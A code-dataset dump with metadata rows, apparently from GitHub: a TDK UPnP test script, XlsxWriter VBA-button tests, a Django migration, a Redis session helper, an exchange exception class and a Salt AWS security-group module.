terface> <test_script>TS_XUPNP_B_RawoffsetValidation</test_script> <skipped>No</skipped> <release_version>M70</release_version> <remarks/> </test_cases> </xml> ''' # use tdklib library,which provides a wrapper for tdk testcase script import tdklib; from xupnplib import *; #Test component to be tested obj = tdklib.TDKScriptingLibrary("xupnp","1"); #IP and Port of box, No need to change, #This will be replaced with correspoing Box Ip and port while executing script ip = <ipaddress> port = <port> obj.configureTestCase(ip,port,'TS_XUPNP_B_RawoffsetValidation'); #Get the result of connection with test component and STB loadmodulestatus=obj.getLoadModuleResult(); print "[LIB LOAD STATUS] : %s" %loadmodulestatus; if "SUCCESS" in loadmodulestatus.upper() : #Set the result status of execution obj.setLoadModuleStatus("SUCCESS"); tdkTestObj = obj.createTestStep("XUPNPStub_CheckXDiscOutputFile"); expectedresult = "SUCCESS"; tdkTestObj.executeTestCase(expectedresult); actualresult = tdkTestObj.getResult(); details = tdkTestObj.getResultDetails(); if expectedresult in actualresult : tdkTestObj.setResultStatus("SUCCESS"); logpath = details.split(" ")[0]; print "\n\n\n**************XUPNP DUT LOG TRANSFER - BEGIN*************\n\n" print "Transfering output log file : %s from DUT"%logpath; logpath = tdkTestObj.transferLogs(logpath, "false"); print "Local file path of Testrunner output log : %s" %logpath; info = open(logpath,'r'); output = info.read(); dictionary = LogParser(output,"rawoffset"); info.close() print "\n**************XUPNP DUT LOG TRANSFER - END*************\n\n" clientip_logfile_dic,NO_OF_CLIENTS = TransferLogsParser(obj); if len(dictionary) == NO_OF_CLIENTS + 1 : tdkTestObj.setResultStatus("SUCCESS"); print "All the connected clients data is populated in output.json file"; for key in clientip_logfile_dic : print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - BEGIN********\n\n"%key; print "Transfering output log file : %s from client with ip : %s"%(clientip_logfile_dic.get(key),key); filepath = tdkTestObj.transferLogs_from_box(key,clientip_logfile_dic.get(key), "false") print "Local file path of Testrunner output log : %s" %filepath; data = open(filepath,'r'); message = data.read() cli_dictionary = LogParser(message,"rawoffset"); print "\n********XUPNP CLIENT WITH IP : %s LOG TRANSFER - END********\n\n"%key; print "\n**************XUPNP OUTPUT - BEGIN*************\n\n" for key in dictionary : if dictionary.get(key) == cli_dictionary.get(key): tdkTestObj.setResultStatus("SUCCESS"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print "ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : SUCCESS"; print "\n********************************************************************************************\n"; else : tdkTestObj.setResultStatus("FAILURE"); print "TEST STEP : Compare whether the rawoffset parameters from DUT and connected client are equal"; print "EXPECTED RESULT : The rawoffset parameters from DUT and connected client should be equal"; print "ACTUAL RESULT : The rawoffset is %s for corresponding %s bcastMacAddress"%(dictionary.get(key),key); print "[TEST EXECUTION RESULT] : FAILURE"; print "\n********************************************************************************************\n"; data.close() print "\n**************XUPNP OUTPUT - END*************\n\n" else : tdkTestObj.setResultStatus("FAILURE"); print "All the connected clients data is NOT populated in output.json file"; else : tdkTestObj.setResultStatus("FAILURE"); print "Failed to get output.json file path from DUT"; print "DETAILS :",details; #Unload upnp module obj.unloadModule("xupnp"); else: print "Failed to load upnp module"; obj.setLoadModuleStatus("FAILURE"); print "Module loading failed";
false
true
f705e0706875e8cf396e8b98af019ceeec2c23b1
1,971
py
Python
xlsxwriter/test/comparison/test_button07.py
dthadi3/XlsxWriter
f1801e82240aa9c746ce14948ef95990b83162cf
[ "BSD-2-Clause-FreeBSD" ]
1
2020-07-01T07:24:37.000Z
2020-07-01T07:24:37.000Z
xlsxwriter/test/comparison/test_button07.py
dthadi3/XlsxWriter
f1801e82240aa9c746ce14948ef95990b83162cf
[ "BSD-2-Clause-FreeBSD" ]
null
null
null
xlsxwriter/test/comparison/test_button07.py
dthadi3/XlsxWriter
f1801e82240aa9c746ce14948ef95990b83162cf
[ "BSD-2-Clause-FreeBSD" ]
null
null
null
############################################################################### # # Tests for XlsxWriter. # # Copyright (c), 2013-2020, John McNamara, jmcnamara@cpan.org # from ..excel_comparison_test import ExcelComparisonTest from ...workbook import Workbook class TestCompareXLSXFiles(ExcelComparisonTest): """ Test file created by XlsxWriter against a file created by Excel. """ def setUp(self): self.set_filename('button07.xlsm') def test_create_file(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() workbook.set_vba_name() worksheet.set_vba_name() worksheet.insert_button('C2', {'macro': 'say_hello', 'caption': 'Hello'}) workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin') workbook.close() self.assertExcelEqual() def test_create_file_explicit_vba_names(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() workbook.set_vba_name('ThisWorkbook') worksheet.set_vba_name('Sheet1') worksheet.insert_button('C2', {'macro': 'say_hello', 'caption': 'Hello'}) workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin') workbook.close() self.assertExcelEqual() def test_create_file_implicit_vba_names(self): """Test the creation of a simple XlsxWriter file.""" workbook = Workbook(self.got_filename) worksheet = workbook.add_worksheet() worksheet.insert_button('C2', {'macro': 'say_hello', 'caption': 'Hello'}) workbook.add_vba_project(self.vba_dir + 'vbaProject02.bin') workbook.close() self.assertExcelEqual()
26.28
79
0.598681
true
true
f705e11b73b8ab51a2717f76d0f1699b82a7b0ae
258
py
Python
biot/core/fan.py
AroliantBIoT/biot-orangepi-client
60df602816cdc0c668e58f91512e93eb5bec3c6d
[ "MIT" ]
null
null
null
biot/core/fan.py
AroliantBIoT/biot-orangepi-client
60df602816cdc0c668e58f91512e93eb5bec3c6d
[ "MIT" ]
null
null
null
biot/core/fan.py
AroliantBIoT/biot-orangepi-client
60df602816cdc0c668e58f91512e93eb5bec3c6d
[ "MIT" ]
null
null
null
class Fan(): """Default Device with ON / OFF Functions""" deviceID = None def __init__(self, deviceID): if deviceID is None: print("Provide a Device ID") return self.deviceID = deviceID def setSpeed(self): pass def getSpeed(self): pass
16.125
45
0.678295
class Fan(): deviceID = None def __init__(self, deviceID): if deviceID is None: print("Provide a Device ID") return self.deviceID = deviceID def setSpeed(self): pass def getSpeed(self): pass
true
true
f705e133aa7892ba240c4677420a97b286673317
3,271
py
Python
projects_api/migrations/0001_initial.py
diegoinn/profile-rest-api
a5b8c9dfe5453db24e93d05367d33e6f37c65966
[ "MIT" ]
null
null
null
projects_api/migrations/0001_initial.py
diegoinn/profile-rest-api
a5b8c9dfe5453db24e93d05367d33e6f37c65966
[ "MIT" ]
null
null
null
projects_api/migrations/0001_initial.py
diegoinn/profile-rest-api
a5b8c9dfe5453db24e93d05367d33e6f37c65966
[ "MIT" ]
null
null
null
# Generated by Django 2.2 on 2020-10-29 04:23 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='ConstructionSystem', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_construction_system', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Material', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_material', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Origin', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_origin', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Project', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_project', models.CharField(max_length=255)), ('use', models.CharField(max_length=255)), ('builded_surface', models.IntegerField()), ('living_area', models.IntegerField()), ('tier', models.IntegerField()), ('useful_life', models.IntegerField()), ], ), migrations.CreateModel( name='Section', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_section', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Unit', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_unit', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='MaterialSchemeProject', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('quantity', models.IntegerField()), ('provider_distance', models.IntegerField()), ('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.ConstructionSystem')), ('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')), ('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')), ('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')), ('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')), ], ), ]
43.039474
148
0.578416
from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='ConstructionSystem', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_construction_system', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Material', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_material', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Origin', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_origin', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Project', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_project', models.CharField(max_length=255)), ('use', models.CharField(max_length=255)), ('builded_surface', models.IntegerField()), ('living_area', models.IntegerField()), ('tier', models.IntegerField()), ('useful_life', models.IntegerField()), ], ), migrations.CreateModel( name='Section', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_section', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='Unit', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name_unit', models.CharField(max_length=255)), ], ), migrations.CreateModel( name='MaterialSchemeProject', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('quantity', models.IntegerField()), ('provider_distance', models.IntegerField()), ('construction_system_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.ConstructionSystem')), ('material_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Material')), ('origin_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Origin')), ('project_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Project')), ('unit_id', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='projects_api.Unit')), ], ), ]
true
true
f705e1ac415f1541823e90e5a27d3686709724a5
370
py
Python
cryptoxlib/clients/aax/exceptions.py
PetrZufan/cryptoxlib-aio
8fbb817ee7a7a88693804e24877863370d1d53c7
[ "MIT" ]
90
2020-04-09T18:34:49.000Z
2022-03-09T14:29:32.000Z
cryptoxlib/clients/aax/exceptions.py
PetrZufan/cryptoxlib-aio
8fbb817ee7a7a88693804e24877863370d1d53c7
[ "MIT" ]
44
2020-04-03T17:02:20.000Z
2022-01-29T14:51:51.000Z
cryptoxlib/clients/aax/exceptions.py
PetrZufan/cryptoxlib-aio
8fbb817ee7a7a88693804e24877863370d1d53c7
[ "MIT" ]
28
2020-04-25T21:34:53.000Z
2022-03-31T07:20:07.000Z
from typing import Optional from cryptoxlib.exceptions import CryptoXLibException class AAXException(CryptoXLibException): pass class AAXRestException(AAXException): def __init__(self, status_code: int, body: Optional[dict]): super().__init__(f"Rest API exception: status [{status_code}], response [{body}]") self.status_code = status_code self.body = body
24.666667
84
0.778378
from typing import Optional from cryptoxlib.exceptions import CryptoXLibException class AAXException(CryptoXLibException): pass class AAXRestException(AAXException): def __init__(self, status_code: int, body: Optional[dict]): super().__init__(f"Rest API exception: status [{status_code}], response [{body}]") self.status_code = status_code self.body = body
true
true
f705e31f80b4e24a70351eb21bb89c4f68671a24
1,229
py
Python
service_api/domain/redis.py
123456789-dnipro/hackaton
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
[ "MIT" ]
null
null
null
service_api/domain/redis.py
123456789-dnipro/hackaton
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
[ "MIT" ]
1
2021-06-01T23:53:20.000Z
2021-06-01T23:53:20.000Z
service_api/domain/redis.py
123456789-dnipro/hackaton
7ad3017d31a1fe6c6cb72f2227e8a108a30a156b
[ "MIT" ]
null
null
null
import aioredis from sanic import Sanic class RedisWorker: def __init__(self): self.__host = None self.__pool = None async def init(self, app: Sanic): self.__host = app.config.REDIS_HOST self.__pool = await aioredis.create_redis(self.__host) async def check_session(self, token): return await self.__pool.expire(token, 300) async def set_conf_msg(self, phone, msg): await self.__pool.set(phone, msg) await self.__pool.expire(phone, 60) async def get_conf_msg(self, phone, msg): real_code = self.__pool.get(phone) if real_code == msg: self.__pool.delete(phone) return True else: return False async def get_user(self, token): return await self.__pool.get(token) async def create_session(self, user_id, token): cur_token = await self.__pool.get(user_id) if not cur_token: await self.__pool.set(token, user_id) await self.__pool.expire(token, 300) else: token = cur_token return token async def close(self): self.__pool.close() await self.__pool.wait_closed() redis = RedisWorker()
26.148936
62
0.62083
import aioredis from sanic import Sanic class RedisWorker: def __init__(self): self.__host = None self.__pool = None async def init(self, app: Sanic): self.__host = app.config.REDIS_HOST self.__pool = await aioredis.create_redis(self.__host) async def check_session(self, token): return await self.__pool.expire(token, 300) async def set_conf_msg(self, phone, msg): await self.__pool.set(phone, msg) await self.__pool.expire(phone, 60) async def get_conf_msg(self, phone, msg): real_code = self.__pool.get(phone) if real_code == msg: self.__pool.delete(phone) return True else: return False async def get_user(self, token): return await self.__pool.get(token) async def create_session(self, user_id, token): cur_token = await self.__pool.get(user_id) if not cur_token: await self.__pool.set(token, user_id) await self.__pool.expire(token, 300) else: token = cur_token return token async def close(self): self.__pool.close() await self.__pool.wait_closed() redis = RedisWorker()
true
true
f705e3f0d1abe21f5b92ea10cdd8b37a2a9906b1
15,509
py
Python
salt/modules/boto_secgroup.py
Achimh3011/salt
b6e6968c22f840df0d43bea7e99c188c623b850b
[ "Apache-2.0" ]
null
null
null
salt/modules/boto_secgroup.py
Achimh3011/salt
b6e6968c22f840df0d43bea7e99c188c623b850b
[ "Apache-2.0" ]
null
null
null
salt/modules/boto_secgroup.py
Achimh3011/salt
b6e6968c22f840df0d43bea7e99c188c623b850b
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- ''' Connection module for Amazon Security Groups .. versionadded:: 2014.7.0 :configuration: This module accepts explicit ec2 credentials but can also utilize IAM roles assigned to the instance trough Instance Profiles. Dynamic credentials are then automatically obtained from AWS API and no further configuration is necessary. More Information available at:: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html If IAM roles are not used you need to specify them either in a pillar or in the minion's config file:: secgroup.keyid: GKTADJGHEIQSXMKKRBJ08H secgroup.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs A region may also be specified in the configuration:: secgroup.region: us-east-1 If a region is not specified, the default is us-east-1. It's also possible to specify key, keyid and region via a profile, either as a passed in dict, or as a string to pull from pillars or minion config: myprofile: keyid: GKTADJGHEIQSXMKKRBJ08H key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs region: us-east-1 :depends: boto ''' from __future__ import absolute_import # Import Python libs import logging import re from distutils.version import LooseVersion as _LooseVersion import six log = logging.getLogger(__name__) # Import third party libs try: import boto import boto.ec2 logging.getLogger('boto').setLevel(logging.CRITICAL) HAS_BOTO = True except ImportError: HAS_BOTO = False from six import string_types import salt.utils.odict as odict def __virtual__(): ''' Only load if boto libraries exist and if boto libraries are greater than a given version. ''' required_boto_version = '2.4.0' # Boto < 2.4.0 GroupOrCIDR objects have different attributes than # Boto >= 2.4.0 GroupOrCIDR objects # Differences include no group_id attribute in Boto < 2.4.0 and returning # a groupId attribute when a GroupOrCIDR object authorizes an IP range # Support for Boto < 2.4.0 can be added if needed if not HAS_BOTO: return False elif _LooseVersion(boto.__version__) < _LooseVersion(required_boto_version): return False else: return True def exists(name=None, region=None, key=None, keyid=None, profile=None, vpc_id=None, group_id=None): ''' Check to see if an security group exists. CLI example:: salt myminion boto_secgroup.exists mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: return True else: return False def _split_rules(rules): ''' Split rules with combined grants into individual rules. Amazon returns a set of rules with the same protocol, from and to ports together as a single rule with a set of grants. Authorizing and revoking rules, however, is done as a split set of rules. This function splits the rules up. ''' split = [] for rule in rules: ip_protocol = rule.get('ip_protocol') to_port = rule.get('to_port') from_port = rule.get('from_port') grants = rule.get('grants') for grant in grants: _rule = {'ip_protocol': ip_protocol, 'to_port': to_port, 'from_port': from_port} for key, val in six.iteritems(grant): _rule[key] = val split.append(_rule) return split def _get_group(conn, name=None, vpc_id=None, group_id=None, region=None): ''' Get a group object given a name, name and vpc_id or group_id. Return a boto.ec2.securitygroup.SecurityGroup object if the group is found, else return None. ''' if name: if vpc_id is None: log.debug('getting group for {0}'.format(name)) group_filter = {'group-name': name} filtered_groups = conn.get_all_security_groups(filters=group_filter) # security groups can have the same name if groups exist in both # EC2-Classic and EC2-VPC # iterate through groups to ensure we return the EC2-Classic # security group for group in filtered_groups: # a group in EC2-Classic will have vpc_id set to None if group.vpc_id is None: return group return None elif vpc_id: log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id)) group_filter = {'group-name': name, 'vpc_id': vpc_id} filtered_groups = conn.get_all_security_groups(filters=group_filter) if len(filtered_groups) == 1: return filtered_groups[0] else: return None else: return None elif group_id: try: groups = conn.get_all_security_groups(group_ids=[group_id]) except boto.exception.BotoServerError as e: log.debug(e) return None if len(groups) == 1: return groups[0] else: return None else: return None def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None): ''' Get a Group ID given a Group Name or Group Name and VPC ID CLI example:: salt myminion boto_secgroup.get_group_id mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, region) if group: return group.id else: return False def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None, profile=None): ''' Given a list of security groups and a vpc_id, convert_to_group_ids will convert all list items in the given list to security group ids. CLI example:: salt myminion boto_secgroup.convert_to_group_ids mysecgroup vpc-89yhh7h ''' log.debug('security group contents {0} pre-conversion'.format(groups)) group_ids = [] for group in groups: if re.match('sg-.*', group): log.debug('group {0} is a group id. get_group_id not called.' .format(group)) group_ids.append(group) else: log.debug('calling boto_secgroup.get_group_id for' ' group name {0}'.format(group)) group_id = get_group_id(group, vpc_id, region, key, keyid, profile) log.debug('group name {0} has group id {1}'.format( group, group_id) ) group_ids.append(str(group_id)) log.debug('security group contents {0} post-conversion'.format(group_ids)) return group_ids def get_config(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Get the configuration for a security group. CLI example:: salt myminion boto_secgroup.get_config mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return None sg = _get_group(conn, name, vpc_id, group_id, region) if sg: ret = odict.OrderedDict() ret['name'] = sg.name # TODO: add support for vpc_id in return # ret['vpc_id'] = sg.vpc_id ret['group_id'] = sg.id ret['owner_id'] = sg.owner_id ret['description'] = sg.description # TODO: add support for tags _rules = [] for rule in sg.rules: log.debug('examining rule {0} for group {1}'.format(rule, sg.id)) attrs = ['ip_protocol', 'from_port', 'to_port', 'grants'] _rule = odict.OrderedDict() for attr in attrs: val = getattr(rule, attr) if not val: continue if attr == 'grants': _grants = [] for grant in val: log.debug('examining grant {0} for'.format(grant)) g_attrs = {'name': 'source_group_name', 'owner_id': 'source_group_owner_id', 'group_id': 'source_group_group_id', 'cidr_ip': 'cidr_ip'} _grant = odict.OrderedDict() for g_attr, g_attr_map in six.iteritems(g_attrs): g_val = getattr(grant, g_attr) if not g_val: continue _grant[g_attr_map] = g_val _grants.append(_grant) _rule['grants'] = _grants elif attr == 'from_port': _rule[attr] = int(val) elif attr == 'to_port': _rule[attr] = int(val) else: _rule[attr] = val _rules.append(_rule) ret['rules'] = _split_rules(_rules) return ret else: return None def create(name, description, vpc_id=None, region=None, key=None, keyid=None, profile=None): ''' Create an autoscale group. CLI example:: salt myminion boto_secgroup.create mysecgroup 'My Security Group' ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False created = conn.create_security_group(name, description, vpc_id) if created: log.info('Created security group {0}.'.format(name)) return True else: msg = 'Failed to create security group {0}.'.format(name) log.error(msg) return False def delete(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Delete an autoscale group. CLI example:: salt myminion boto_secgroup.delete mysecgroup ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: deleted = conn.delete_security_group(group_id=group.id) if deleted: log.info('Deleted security group {0} with id {1}.'.format(group.name, group.id)) return True else: msg = 'Failed to delete security group {0}.'.format(name) log.error(msg) return False else: log.debug('Security group not found.') return False def authorize(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Add a new rule to an existing security group. CLI example:: salt myminion boto_secgroup.authorize mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='['10.0.0.0/8', '192.168.0.0/24']' ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: added = conn.authorize_security_group( src_security_group_name=source_group_name, src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if added: log.info('Added rule to security group {0} with id {1}' .format(group.name, group.id)) return True else: msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to add rule to security group.') return False def revoke(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): ''' Remove a rule from an existing security group. CLI example:: salt myminion boto_secgroup.revoke mysecgroup ip_protocol=tcp from_port=80 to_port=80 cidr_ip='10.0.0.0/8' ''' conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: revoked = conn.revoke_security_group( src_security_group_name=source_group_name, src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if revoked: log.info('Removed rule from security group {0} with id {1}.' .format(group.name, group.id)) return True else: msg = ('Failed to remove rule from security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to remove rule from security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to remove rule from security group.') return False def _get_conn(region, key, keyid, profile): ''' Get a boto connection to ec2. ''' if profile: if isinstance(profile, string_types): _profile = __salt__['config.option'](profile) elif isinstance(profile, dict): _profile = profile key = _profile.get('key', None) keyid = _profile.get('keyid', None) region = _profile.get('region', None) if not region and __salt__['config.option']('secgroup.region'): region = __salt__['config.option']('secgroup.region') if not region: region = 'us-east-1' if not key and __salt__['config.option']('secgroup.key'): key = __salt__['config.option']('secgroup.key') if not keyid and __salt__['config.option']('secgroup.keyid'): keyid = __salt__['config.option']('secgroup.keyid') try: conn = boto.ec2.connect_to_region(region, aws_access_key_id=keyid, aws_secret_access_key=key) except boto.exception.NoAuthHandlerFound: log.error('No authentication credentials found when attempting to' ' make ec2 connection for security groups.') return None return conn
35.009029
139
0.59488
from __future__ import absolute_import import logging import re from distutils.version import LooseVersion as _LooseVersion import six log = logging.getLogger(__name__) try: import boto import boto.ec2 logging.getLogger('boto').setLevel(logging.CRITICAL) HAS_BOTO = True except ImportError: HAS_BOTO = False from six import string_types import salt.utils.odict as odict def __virtual__(): required_boto_version = '2.4.0' if not HAS_BOTO: return False elif _LooseVersion(boto.__version__) < _LooseVersion(required_boto_version): return False else: return True def exists(name=None, region=None, key=None, keyid=None, profile=None, vpc_id=None, group_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: return True else: return False def _split_rules(rules): split = [] for rule in rules: ip_protocol = rule.get('ip_protocol') to_port = rule.get('to_port') from_port = rule.get('from_port') grants = rule.get('grants') for grant in grants: _rule = {'ip_protocol': ip_protocol, 'to_port': to_port, 'from_port': from_port} for key, val in six.iteritems(grant): _rule[key] = val split.append(_rule) return split def _get_group(conn, name=None, vpc_id=None, group_id=None, region=None): if name: if vpc_id is None: log.debug('getting group for {0}'.format(name)) group_filter = {'group-name': name} filtered_groups = conn.get_all_security_groups(filters=group_filter) for group in filtered_groups: if group.vpc_id is None: return group return None elif vpc_id: log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id)) group_filter = {'group-name': name, 'vpc_id': vpc_id} filtered_groups = conn.get_all_security_groups(filters=group_filter) if len(filtered_groups) == 1: return filtered_groups[0] else: return None else: return None elif group_id: try: groups = conn.get_all_security_groups(group_ids=[group_id]) except boto.exception.BotoServerError as e: log.debug(e) return None if len(groups) == 1: return groups[0] else: return None else: return None def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, region) if group: return group.id else: return False def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None, profile=None): log.debug('security group contents {0} pre-conversion'.format(groups)) group_ids = [] for group in groups: if re.match('sg-.*', group): log.debug('group {0} is a group id. get_group_id not called.' .format(group)) group_ids.append(group) else: log.debug('calling boto_secgroup.get_group_id for' ' group name {0}'.format(group)) group_id = get_group_id(group, vpc_id, region, key, keyid, profile) log.debug('group name {0} has group id {1}'.format( group, group_id) ) group_ids.append(str(group_id)) log.debug('security group contents {0} post-conversion'.format(group_ids)) return group_ids def get_config(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return None sg = _get_group(conn, name, vpc_id, group_id, region) if sg: ret = odict.OrderedDict() ret['name'] = sg.name ret['group_id'] = sg.id ret['owner_id'] = sg.owner_id ret['description'] = sg.description _rules = [] for rule in sg.rules: log.debug('examining rule {0} for group {1}'.format(rule, sg.id)) attrs = ['ip_protocol', 'from_port', 'to_port', 'grants'] _rule = odict.OrderedDict() for attr in attrs: val = getattr(rule, attr) if not val: continue if attr == 'grants': _grants = [] for grant in val: log.debug('examining grant {0} for'.format(grant)) g_attrs = {'name': 'source_group_name', 'owner_id': 'source_group_owner_id', 'group_id': 'source_group_group_id', 'cidr_ip': 'cidr_ip'} _grant = odict.OrderedDict() for g_attr, g_attr_map in six.iteritems(g_attrs): g_val = getattr(grant, g_attr) if not g_val: continue _grant[g_attr_map] = g_val _grants.append(_grant) _rule['grants'] = _grants elif attr == 'from_port': _rule[attr] = int(val) elif attr == 'to_port': _rule[attr] = int(val) else: _rule[attr] = val _rules.append(_rule) ret['rules'] = _split_rules(_rules) return ret else: return None def create(name, description, vpc_id=None, region=None, key=None, keyid=None, profile=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False created = conn.create_security_group(name, description, vpc_id) if created: log.info('Created security group {0}.'.format(name)) return True else: msg = 'Failed to create security group {0}.'.format(name) log.error(msg) return False def delete(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: deleted = conn.delete_security_group(group_id=group.id) if deleted: log.info('Deleted security group {0} with id {1}.'.format(group.name, group.id)) return True else: msg = 'Failed to delete security group {0}.'.format(name) log.error(msg) return False else: log.debug('Security group not found.') return False def authorize(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: added = conn.authorize_security_group( src_security_group_name=source_group_name, src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if added: log.info('Added rule to security group {0} with id {1}' .format(group.name, group.id)) return True else: msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to add rule to security group.') return False def revoke(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: revoked = conn.revoke_security_group( src_security_group_name=source_group_name, 